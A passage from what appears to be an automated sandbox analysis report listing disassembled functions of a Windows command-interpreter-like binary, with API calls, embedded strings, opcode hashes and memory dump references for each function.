                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7E1DD9A82), ref: 00007FF7E1DDA77A
                                                      • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7E1DD9A82), ref: 00007FF7E1DDA7AF
                                                      • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7E1DD9A82), ref: 00007FF7E1DDA80E
                                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7E1DD9A82), ref: 00007FF7E1DDA839
                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7E1DD9A82), ref: 00007FF7E1DDA850
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: QueryValue$CloseErrorLastOpen
                                                      • String ID:
                                                      • API String ID: 2240656346-0
                                                      • Opcode ID: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                      • Instruction ID: b38a3a9f9cf5a5acf367a5d65db485e9019db06576a00c837405e3cdef694ad6
                                                      • Opcode Fuzzy Hash: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                      • Instruction Fuzzy Hash: C431B232A18A4292EB10EF14E4416B9F7A4FB8C790F958136EA8E42754DF7CD8418B21
                                                      Function 00007FF7E1DDD0C0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DC01B8: _get_osfhandle.MSVCRT ref: 00007FF7E1DC01C4
                                                        • Part of subcall function 00007FF7E1DC01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7E1DCE904,?,?,?,?,00000000,00007FF7E1DC3491,?,?,?,00007FF7E1DD4420), ref: 00007FF7E1DC01D6
                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7E1DDD0F9
                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7E1DDD10F
                                                      • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7E1DDD166
                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7E1DDD17A
                                                      • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7E1DDD18C
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                                      • String ID:
                                                      • API String ID: 3008996577-0
                                                      • Opcode ID: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                      • Instruction ID: eb06e9f46e8c6e8e46e89c25f01fa88308093ece6be68f6665b3c3659ee92fd6
                                                      • Opcode Fuzzy Hash: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                      • Instruction Fuzzy Hash: FC217C26F14A418AE700EB71E4012BCB7B0FB4DB45B849236EE0D93B98DF38D040CB21
                                                      Function 00007FF7E1DD5770 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 169COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CreateSemaphore
                                                      • String ID: _p0$wil
                                                      • API String ID: 1078844751-1814513734
                                                      • Opcode ID: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                      • Instruction ID: 64eb4fd2208630712e9430ac44b70017d87530f80a757d3062b92cd977c74b72
                                                      • Opcode Fuzzy Hash: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                      • Instruction Fuzzy Hash: 765117A1B1974286EF21EF5884567B9E2A0EF84B90FD44633DA0E47780DFBDE4058321
                                                      Function 00007FF7E1DDB89C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF7E1DDB934
                                                      • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7E1DC5085), ref: 00007FF7E1DDB9A5
                                                      • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7E1DC5085), ref: 00007FF7E1DDB9F7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                                      • String ID: %WINDOWS_COPYRIGHT%
                                                      • API String ID: 1103618819-1745581171
                                                      • Opcode ID: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                      • Instruction ID: 052f07f01d07f49193ecbcf23ea2154ab8d2ff8bf6f0a1651796ac3534456f60
                                                      • Opcode Fuzzy Hash: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                      • Instruction Fuzzy Hash: 8C41A262E08B8282EB10EF119452379B7A0FB4AB95FC59332DA9D47395DFBCE481C311
                                                      Function 00007FF7E1DE0774 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$_wcslwr
                                                      • String ID: [%s]
                                                      • API String ID: 886762496-302437576
                                                      • Opcode ID: edde6ab5db54e3a5535b346c374fc5c976f6442aa931e6f93dfa572844f0dcb2
                                                      • Instruction ID: 988ffe214fd02a0511edfbebf8be999e2121e2606affef89a1b5711694d95ae2
                                                      • Opcode Fuzzy Hash: edde6ab5db54e3a5535b346c374fc5c976f6442aa931e6f93dfa572844f0dcb2
                                                      • Instruction Fuzzy Hash: D9319E32B05B8685EB25EF21D8917E9A7A0FB88B88F848136DE4D87754DF7CD245C300
                                                      Function 00007FF7E1DC32E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DC33A8: iswspace.MSVCRT(?,?,00000000,00007FF7E1DDD6EE,?,?,?,00007FF7E1DD0632), ref: 00007FF7E1DC33C0
                                                      • iswspace.MSVCRT(?,?,?,00007FF7E1DC32A4), ref: 00007FF7E1DC331C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: iswspace
                                                      • String ID: off
                                                      • API String ID: 2389812497-733764931
                                                      • Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                      • Instruction ID: 3cd32d028c9ccdaeffb85a33dfb0399a2746a29ffc38557cae928e3ff8438fc2
                                                      • Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                      • Instruction Fuzzy Hash: 8A214C21F0C652A1FB64FB159552379FAA0EF85B90FD88436D90E86784DEBCE440C6A3
                                                      Function 00007FF7E1DD9308 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: wcschr$Heapiswspace$AllocProcess
                                                      • String ID: %s=%s$DPATH$PATH
                                                      • API String ID: 3731854180-3148396303
                                                      • Opcode ID: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                                      • Instruction ID: eea2dd9ee1255c07c1855c5781151e49d3c93d7cc779e9afd222aee6b181fda1
                                                      • Opcode Fuzzy Hash: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                                      • Instruction Fuzzy Hash: D8219215F0965680EF59FB55E442379A360AF84B80FC89237D90E83395DFBDE440C3A2
                                                      Function 00007FF7E1DC8198 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: wcscmp
                                                      • String ID: *.*$????????.???
                                                      • API String ID: 3392835482-3870530610
                                                      • Opcode ID: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                      • Instruction ID: 50af0dcd87d2cfe706604e86cf45e5c2e965481ec8cd38e4018b2281685a35e6
                                                      • Opcode Fuzzy Hash: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                      • Instruction Fuzzy Hash: D7112925B14A6240E764EF12B482639F3A1FB84B80F894432CE4D43B45DFBCE491C351
                                                      Function 00007FF7E1DD9114 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: fprintf
                                                      • String ID: CMD Internal Error %s$%s$Null environment
                                                      • API String ID: 383729395-2781220306
                                                      • Opcode ID: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                      • Instruction ID: 71aaff33c28f5e7d1e48ee4da68a3d82b400d73214bbf665dee3e08bb859851b
                                                      • Opcode Fuzzy Hash: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                      • Instruction Fuzzy Hash: 9D119421D0864291EB59EB24D5022B9A271EB447B0FC44337D57E832D4DFBDE441C352
                                                      Function 00007FF7E1DC09F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: iswspacewcschr
                                                      • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$=,;
                                                      • API String ID: 287713880-1183017076
                                                      • Opcode ID: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                      • Instruction ID: a4ac195c62c4f4a0ec6635d94b10db2ec2f22262b5b7e51bd8adc2725f9af129
                                                      • Opcode Fuzzy Hash: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                      • Instruction Fuzzy Hash: 39F0F425E08A4691EB24DB05E40223FE5A0FF44F41FC59632D90E82254DF7CD440C662
                                                      Function 00007FF7E1DC04F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: AddressHandleModuleProc
                                                      • String ID: KERNEL32.DLL$SetThreadUILanguage
                                                      • API String ID: 1646373207-2530943252
                                                      • Opcode ID: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                      • Instruction ID: f6752d62d6d4d400ee06e5239940debec9a6c88f9419e38ffa25d2b8eb171e81
                                                      • Opcode Fuzzy Hash: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                      • Instruction Fuzzy Hash: 0C010C65E09A0696EB48E711A853339B2A0EF59731BC48777C52E423E0DEBCB5548362
                                                      Function 00007FF7E1DD73C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: AddressHandleModuleProc
                                                      • String ID: RaiseFailFastException$kernelbase.dll
                                                      • API String ID: 1646373207-919018592
                                                      • Opcode ID: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                      • Instruction ID: b2df41fd6512c423288f666dd3d4606254ef437dd90420f5d5e1f65e4da00132
                                                      • Opcode Fuzzy Hash: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                      • Instruction Fuzzy Hash: 0BF06725A08A8192EB08AB02F445139FB60EB88BD1B88D132DA0E43B14CFBCD4818710
                                                      Function 00007FF7E1DB1130 Relevance: 6.2, APIs: 4, Instructions: 156COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$CurrentDirectorytowupper
                                                      • String ID:
                                                      • API String ID: 1403193329-0
                                                      • Opcode ID: 8f12ec0cfcd936a987ebeb0b3721ecca5b9c81898bdfe4a19f372ac06b3fdf31
                                                      • Instruction ID: a1b5cf2bda2aa43f7727c35679bfb5ae8debeb5020df825faef572e3e9928256
                                                      • Opcode Fuzzy Hash: 8f12ec0cfcd936a987ebeb0b3721ecca5b9c81898bdfe4a19f372ac06b3fdf31
                                                      • Instruction Fuzzy Hash: C561C232A087828AE710DF65E8417EDB7A4FB84748F904536DE5E43799DF78D450C711
                                                      Function 00007FF7E1DC4878 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _wcsnicmp$wcschr
                                                      • String ID:
                                                      • API String ID: 3270668897-0
                                                      • Opcode ID: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
                                                      • Instruction ID: 2a6b7bac087105b343c510d7a8adf1b162b9bdec1f2bd9df3dbbdf7007fc777f
                                                      • Opcode Fuzzy Hash: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
                                                      • Instruction Fuzzy Hash: DA51AF51E0865281EB65FF1594023B9E6A4EF45B80FD88932CA1E472D5DFBCE941C3B2
                                                      Function 00007FF7E1DDF358 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$DriveFullNamePathType
                                                      • String ID:
                                                      • API String ID: 3442494845-0
                                                      • Opcode ID: c4faa7a40be53a6a0e94dcc52435e0141cda1ae593caa646d4c93336f675662c
                                                      • Instruction ID: ce7f6a86a4d8d29195eff616118a141698825f14d6cca20909f9bb5f0289b02b
                                                      • Opcode Fuzzy Hash: c4faa7a40be53a6a0e94dcc52435e0141cda1ae593caa646d4c93336f675662c
                                                      • Instruction Fuzzy Hash: A231C032615BC28AEB60DF21E8417F9B7A4FB88B88F848136EA4D47B54CF38D245C710
                                                      Function 00007FF7E1DC8F80 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
